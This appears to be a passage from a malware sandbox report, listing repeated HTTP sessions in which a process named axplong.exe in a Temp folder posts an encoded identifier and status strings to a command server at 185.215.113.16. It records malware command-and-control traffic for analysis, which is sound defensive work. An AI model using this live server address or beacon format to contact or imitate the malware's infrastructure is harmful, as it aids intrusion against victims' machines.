Sep 26, 2024 22:42:22.458580017 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:22.689250946 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	62689	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:22.800272942 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:23.545484066 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:23.546443939 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:23.782258987 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	62690	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:23.893906116 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:24.611094952 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:24.611999035 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:24.840203047 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	62691	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:24.957628012 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:25.732588053 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:25.733530998 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:25.958981037 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	62692	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:26.082056999 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:26.792156935 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:26.793190002 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:27.019987106 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	62693	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:27.127999067 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:27.847433090 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:27.848187923 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:28.080615044 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	62694	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:28.192573071 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:28.883491039 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:28.884259939 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:29.107151985 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	62695	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:29.579821110 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:30.289290905 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:30.290009975 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:30.524524927 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	62696	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:30.655711889 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:31.368644953 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:31.369348049 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:31.600564957 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	62697	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:31.721787930 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:32.416749954 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:32.417534113 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:32.655025005 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	62698	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:32.768623114 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:33.498179913 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:33.499021053 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:33.733938932 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	62699	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:33.847259045 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:34.549863100 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:34.550781012 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:34.789962053 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	62700	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:34.909859896 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:35.610896111 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:35.611685991 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:35.834880114 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
